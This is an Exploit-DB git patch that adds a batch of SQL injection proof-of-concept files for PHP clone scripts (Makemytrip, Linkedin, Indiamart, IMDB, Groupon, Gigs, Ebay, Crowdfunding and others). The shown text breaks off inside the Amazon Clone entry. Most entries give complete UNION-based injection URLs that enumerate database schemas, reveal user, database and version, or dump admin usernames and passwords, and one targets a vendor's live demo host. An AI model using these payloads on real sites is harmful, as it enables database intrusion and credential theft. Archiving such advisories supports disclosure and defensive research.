From 97b5f8cc5bbafbac383c58f2e358f146d8041bfe Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sun, 10 Dec 2017 05:02:21 +0000 Subject: [PATCH] DB: 2017-12-10 20 changes to exploits/shellcodes FS Makemytrip Clone 1.0 - 'fl_orig' / 'fl_dest' SQL Injection FS Linkedin Clone 1.0 - 'grid' / 'fid' / 'id' SQL Injection FS Indiamart Clone 1.0 - 'token' / 'id' / 'c' SQL Injection FS IMDB Clone 1.0 - 'f' / 's' / 'id' SQL Injection FS Grubhub Clone 1.0 - 'keywords' SQL Injection FS Groupon Clone 1.0 - 'id' SQL Injection FS Gigs Script 1.0 - 'cat' / 'sc' SQL Injection FS Freelancer Clone 1.0 - 'profile.php?u' SQL Injection FS Ebay Clone 1.0 - 'id' / 'sub_category_id' / 'category_id' SQL Injection FS Crowdfunding Script 1.0 - 'latest_news_details.php?id' SQL Injection FS Care Clone 1.0 - 'jobFrequency' / 'jobType' SQL Injection FS Amazon Clone 1.0 - SQL Injection FS Trademe Clone 1.0 - 'search' / 'id' SQL Injection FS Expedia Clone 1.0 - 'fl_orig' / 'fl_dest' / 'id' SQL Injection FS Foodpanda Clone 1.0 - SQL Injection Advance B2B Script 2.1.3 - 'show_id' / 'pid' SQL Injection Advance Online Learning Management Script 3.1 - 'subcatid' / 'popcourseid' SQL Injection Affiliate MLM Script 1.0 - 'product-category.php?key' SQL Injection Basic B2B Script 2.0.8 - 'product_details.php?id' SQL Injection Beauty Parlour Booking Script 1.0 - 'gender' / 'city' SQL Injection --- exploits/php/webapps/43246.txt | 36 ++++++++++++++++++++ exploits/php/webapps/43249.txt | 43 ++++++++++++++++++++++++ exploits/php/webapps/43250.txt | 43 ++++++++++++++++++++++++ exploits/php/webapps/43251.txt | 43 ++++++++++++++++++++++++ exploits/php/webapps/43252.html | 30 +++++++++++++++++ exploits/php/webapps/43253.txt | 36 ++++++++++++++++++++ exploits/php/webapps/43254.txt | 43 ++++++++++++++++++++++++ exploits/php/webapps/43255.txt | 29 +++++++++++++++++ exploits/php/webapps/43256.txt | 43 ++++++++++++++++++++++++ exploits/php/webapps/43257.txt | 29 +++++++++++++++++ exploits/php/webapps/43258.txt | 25 ++++++++++++++ exploits/php/webapps/43259.txt | 29 +++++++++++++++++ exploits/php/webapps/43260.txt | 36 ++++++++++++++++++++ exploits/php/webapps/43261.txt | 46 ++++++++++++++++++++++++++ exploits/php/webapps/43262.html | 30 +++++++++++++++++ exploits/php/webapps/43263.txt | 58 +++++++++++++++++++++++++++++++++ exploits/php/webapps/43264.txt | 54 ++++++++++++++++++++++++++++++ exploits/php/webapps/43265.txt | 30 +++++++++++++++++ exploits/php/webapps/43266.txt | 28 ++++++++++++++++ exploits/php/webapps/43267.txt | 36 ++++++++++++++++++++ files_exploits.csv | 20 ++++++++++++ 21 files changed, 767 insertions(+) create mode 100644 exploits/php/webapps/43246.txt create mode 100644 exploits/php/webapps/43249.txt create mode 100644 exploits/php/webapps/43250.txt create mode 100644 exploits/php/webapps/43251.txt create mode 100644 exploits/php/webapps/43252.html create mode 100644 exploits/php/webapps/43253.txt create mode 100644 exploits/php/webapps/43254.txt create mode 100644 exploits/php/webapps/43255.txt create mode 100644 exploits/php/webapps/43256.txt create mode 100644 exploits/php/webapps/43257.txt create mode 100644 exploits/php/webapps/43258.txt create mode 100644 exploits/php/webapps/43259.txt create mode 100644 exploits/php/webapps/43260.txt create mode 100644 exploits/php/webapps/43261.txt create mode 100644 exploits/php/webapps/43262.html create mode 100644 exploits/php/webapps/43263.txt create mode 100644 exploits/php/webapps/43264.txt create mode 100644 exploits/php/webapps/43265.txt create mode 100644 exploits/php/webapps/43266.txt create mode 100644 exploits/php/webapps/43267.txt diff --git a/exploits/php/webapps/43246.txt b/exploits/php/webapps/43246.txt new file mode 100644 index 000000000..f086f02b8 --- /dev/null +++ b/exploits/php/webapps/43246.txt @@ -0,0 +1,36 @@ +# # # # # +# Exploit Title: FS Makemytrip Clone 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://fortunescripts.com/ +# Software Link: https://fortunescripts.com/product/makemytrip-clone/ +# Demo: http://makemytrip-clone.demonstration.co.in/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/show-flight-result.php?&fl_orig=[SQL] +# +# 27'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(25),(26),(27),(28))--+- +# +# http://server/show-flight-result.php?&fl_orig=27'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(25),(26),(27),(28))--+- +# +# 2) +# http://localhost/[PATH]/show-flight-result.php?fl_dest=[SQL] +# +# 27'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(25),(26),(27),(28))--+- +# +# http://server/show-flight-result.php?fl_dest=27'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(25),(26),(27),(28))--+- +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43249.txt b/exploits/php/webapps/43249.txt new file mode 100644 index 000000000..3a3d3bbd3 --- /dev/null +++ b/exploits/php/webapps/43249.txt @@ -0,0 +1,43 @@ +# # # # # +# Exploit Title: FS Linkedin Clone 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://fortunescripts.com/ +# Software Link: https://fortunescripts.com/product/linkedin-clone/ +# Demo: http://linkedin-clone.demonstration.co.in/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/group.php?grid=[SQL] +# +# -1'++UNION+ALL+SELECT+1,2,3,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR+1,4,0x30),0x3a20,table_name,0x3c62723e))))x),5,6,7,8,9,10,11,12,13,14--+- +# +# http://server/group.php?grid=-1'++UNION+ALL+SELECT+1,2,3,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR+1,4,0x30),0x3a20,table_name,0x3c62723e))))x),5,6,7,8,9,10,11,12,13,14--+- +# +# 2) +# http://localhost/[PATH]/profile.php?fid=[SQL] +# +# -44'++UNION(SELECT(1),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(3),(4),(5),(6),(7),(8),(9),(10),(11))--+- +# +# http://server/profile.php?fid=-44'++UNION(SELECT(1),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(3),(4),(5),(6),(7),(8),(9),(10),(11))--+- +# +# 3) +# http://localhost/[PATH]/company_details.php?id=[SQL] +# +# -9491e369853df766fa44e1ed0ff613f563bd'++UNION+ALL+SELECT+1,2,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),4,5,6,7--+- +# +# http://server/company_details.php?id=-9491e369853df766fa44e1ed0ff613f563bd'++UNION+ALL+SELECT+1,2,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),4,5,6,7--+- +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43250.txt b/exploits/php/webapps/43250.txt new file mode 100644 index 000000000..9dd325a32 --- /dev/null +++ b/exploits/php/webapps/43250.txt @@ -0,0 +1,43 @@ +# # # # # +# Exploit Title: FS Indiamart Clone 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://fortunescripts.com/ +# Software Link: https://fortunescripts.com/product/indiamart-clone/ +# Demo: http://indiamart-clone.demonstration.co.in/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/catcompany.php?token=[SQL] +# +# -7219b53b3a3d6ab90ce0268229151c9bde11'++UNION(SELECT(1),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(3),(4),(5),(6))--+- +# +# http://server/catcompany.php?token=-7219b53b3a3d6ab90ce0268229151c9bde11'++UNION(SELECT(1),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(3),(4),(5),(6))--+- +# +# 2) +# http://localhost/[PATH]/buyleads-details.php?id=[SQL] +# +# -9586c4ca4238a0b923820dcc509a6f75849b'++UNION(SELECT(1),(2),(3),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47))--+- +# +# http://server/buyleads-details.php?id=-9586c4ca4238a0b923820dcc509a6f75849b'++UNION(SELECT(1),(2),(3),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47))--+- +# +# 3) +# http://localhost/[PATH]/company/index.php?c=[SQL] +# +# -5471c4ca4238a0b923820dcc509a6f75849b'++UNION(SELECT(1),(2),(3),(4),(5),(6),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52),(53),(54),(55),(56),(57),(58),(59),(60),(61),(62),(63),(64),(65),(66),(67),(68),(69),(70),(71),(72),(73),(74),(75),(76),(77))--+- +# +# http://server/company/index.php?c=-5471c4ca4238a0b923820dcc509a6f75849b'++UNION(SELECT(1),(2),(3),(4),(5),(6),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52),(53),(54),(55),(56),(57),(58),(59),(60),(61),(62),(63),(64),(65),(66),(67),(68),(69),(70),(71),(72),(73),(74),(75),(76),(77))--+- +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43251.txt b/exploits/php/webapps/43251.txt new file mode 100644 index 000000000..5a8c83480 --- /dev/null +++ b/exploits/php/webapps/43251.txt @@ -0,0 +1,43 @@ +# # # # # +# Exploit Title: FS IMDB Clone 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://fortunescripts.com/ +# Software Link: https://fortunescripts.com/product/imdb-clone/ +# Demo: http://imdb-clone.demonstration.co.in/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/movie.php?f=[SQL] +# +# -10++UNION(SELECT(1),(2),(3),(4),(5),(6),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34))--+- +# +# http://server/movie.php?f=-10++UNION(SELECT(1),(2),(3),(4),(5),(6),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34))--+- +# +# 2) +# http://localhost/[PATH]/tvshow.php?s=[SQL] +# +# -1++UNION(SELECT(1),(2),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18))--+- +# +# http://server/tvshow.php?s=-1++UNION(SELECT(1),(2),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18))--+- +# +# 3) +# http://localhost/[PATH]/show_misc_video.php?id=[SQL] +# +# -1++UNION(SELECT(1),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(3),(4),(5),(6),(7),(8))--+- +# +# http://server/show_misc_video.php?id=-1++UNION(SELECT(1),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(3),(4),(5),(6),(7),(8))--+- +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43252.html b/exploits/php/webapps/43252.html new file mode 100644 index 000000000..fe93106e7 --- /dev/null +++ b/exploits/php/webapps/43252.html @@ -0,0 +1,30 @@ + + + +
+ + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/43253.txt b/exploits/php/webapps/43253.txt new file mode 100644 index 000000000..2fb0847b0 --- /dev/null +++ b/exploits/php/webapps/43253.txt @@ -0,0 +1,36 @@ +# # # # # +# Exploit Title: FS Groupon Clone 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://fortunescripts.com/ +# Software Link: https://fortunescripts.com/product/groupon-clone/ +# Demo: http://groupon-clone.demonstration.co.in/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/item_details.php?id=[SQL] +# +# -1++UNION+ALL+SELECT+1,2,3,4,5,6,7,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),9,10,11,12,13,14,15,16,17--+- +# +# http://server/item_details.php?id=-1++UNION+ALL+SELECT+1,2,3,4,5,6,7,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),9,10,11,12,13,14,15,16,17--+- +# +# 2) +# http://localhost/[PATH]/vendor_details.php?id=[SQL] +# +# -2++UNION+ALL+SELECT+1,2,3,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),5,6,7,8,9,10,11,12,13,14,15--+- +# +# http://server/vendor_details.php?id=-2++UNION+ALL+SELECT+1,2,3,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),5,6,7,8,9,10,11,12,13,14,15--+- +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43254.txt b/exploits/php/webapps/43254.txt new file mode 100644 index 000000000..6dc6edf6f --- /dev/null +++ b/exploits/php/webapps/43254.txt @@ -0,0 +1,43 @@ +# # # # # +# Exploit Title: FS Gigs Script 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://fortunescripts.com/ +# Software Link: https://fortunescripts.com/product/gigs-script/ +# Demo: http://gigs.demonstration.co.in/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/browse-category.php?cat=[SQL] +# +# -83c4ca4238a0b923820dcc509a6f75849b'++/*!50000UNION*/+/*!50000SELECT*/+1,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3,4,5--+- +# +# http://server/browse-category.php?cat=-83c4ca4238a0b923820dcc509a6f75849b'++/*!50000UNION*/+/*!50000SELECT*/+1,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3,4,5--+- +# +# 2) +# http://localhost/[PATH]/browse-scategory.php?sc=[SQL] +# +# -53c81e728d9d4c2f636f067f89cc14862c'++UNION(SELECT(1),(2),(3),(4),(5),(6),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(8),(9),(10))--+- +# +# http://server/browse-scategory.php?sc=-53c81e728d9d4c2f636f067f89cc14862c'++UNION(SELECT(1),(2),(3),(4),(5),(6),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(8),(9),(10))--+- +# +# 3) +# http://localhost/[PATH]/service-provider.php?ser=[SQL] +# +# -1873'+UNION(SELECT(1),(2),(3),(4),(5),(6),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52))--+- +# +# http://gigs.demonstration.co.in/service-provider.php?ser=-1873'+UNION(SELECT(1),(2),(3),(4),(5),(6),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52))--+- +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43255.txt b/exploits/php/webapps/43255.txt new file mode 100644 index 000000000..1997566c1 --- /dev/null +++ b/exploits/php/webapps/43255.txt @@ -0,0 +1,29 @@ +# # # # # +# Exploit Title: FS Freelancer Clone 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://fortunescripts.com/ +# Software Link: https://fortunescripts.com/product/freelancer-clone/ +# Demo: http://freelancer-clone.demonstration.co.in/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/profile.php?u=[SQL] +# +# -c4ca4238a0b923820dcc509a6f75849b'++UNION+ALL+SELECT+1,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35--+- +# +# http://server/profile.php?u=-c4ca4238a0b923820dcc509a6f75849b'++UNION+ALL+SELECT+1,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35--+- +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43256.txt b/exploits/php/webapps/43256.txt new file mode 100644 index 000000000..da9c56a56 --- /dev/null +++ b/exploits/php/webapps/43256.txt @@ -0,0 +1,43 @@ +# # # # # +# Exploit Title: FS Ebay Clone 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://fortunescripts.com/ +# Software Link: https://fortunescripts.com/product/ebay-clone/ +# Demo: http://ebay-clone.demonstration.co.in/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/product.php?id=[SQL] +# +# -9++UNION(SELECT(1),(2),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20))--+- +# +# http://server/product.php?id=-9++UNION(SELECT(1),(2),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20))--+- +# +# 2) +# http://localhost/[PATH]/search.php?category_id=1&sub_category_id=[SQL] +# +# -1++UNION(SELECT(1),(2),(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x61646d696e),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16))--+- +# +# http://server/search.php?category_id=1&sub_category_id=-1++UNION(SELECT(1),(2),(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x61646d696e),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16))--+- +# +# 3) +# http://localhost/[PATH]/search.php?category_id=[SQL] +# +# -1++UNION(SELECT(1),(2),(SELECT+GROUP_CONCAT(id,username,password+SEPARATOR+0x3c62723e)+FROM+admin),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16))--+- +# +# http://server/search.php?category_id=-1++UNION(SELECT(1),(2),(SELECT+GROUP_CONCAT(id,username,password+SEPARATOR+0x3c62723e)+FROM+admin),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16))--+- +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43257.txt b/exploits/php/webapps/43257.txt new file mode 100644 index 000000000..983ed073a --- /dev/null +++ b/exploits/php/webapps/43257.txt @@ -0,0 +1,29 @@ +# # # # # +# Exploit Title: FS Crowdfunding Script 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://fortunescripts.com/ +# Software Link: https://fortunescripts.com/product/crowdfunding-script/ +# Demo: http://crowdfunding.demonstration.co.in/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/latest_news_details.php?id=[SQL] +# +# -4'++UNION+ALL+SELECT+1,2,3,4,5,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2))--+- +# +# http://server/latest_news_details.php?id=-4'++UNION+ALL+SELECT+1,2,3,4,5,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2))--+- +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43258.txt b/exploits/php/webapps/43258.txt new file mode 100644 index 000000000..b856816c7 --- /dev/null +++ b/exploits/php/webapps/43258.txt @@ -0,0 +1,25 @@ +# # # # # +# Exploit Title: FS Care Clone 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://fortunescripts.com/ +# Software Link: https://fortunescripts.com/product/care-clone/ +# Demo: http://care-clone.demonstration.co.in/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/searchJob.php?jobType=[SQL]&jobFrequency=[SQL] +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43259.txt b/exploits/php/webapps/43259.txt new file mode 100644 index 000000000..6ce92680e --- /dev/null +++ b/exploits/php/webapps/43259.txt @@ -0,0 +1,29 @@ +# # # # # +# Exploit Title: FS Amazon Clone 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://fortunescripts.com/ +# Software Link: https://fortunescripts.com/product/amazon-clone/ +# Demo: http://amazon-clone.demonstration.co.in/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# 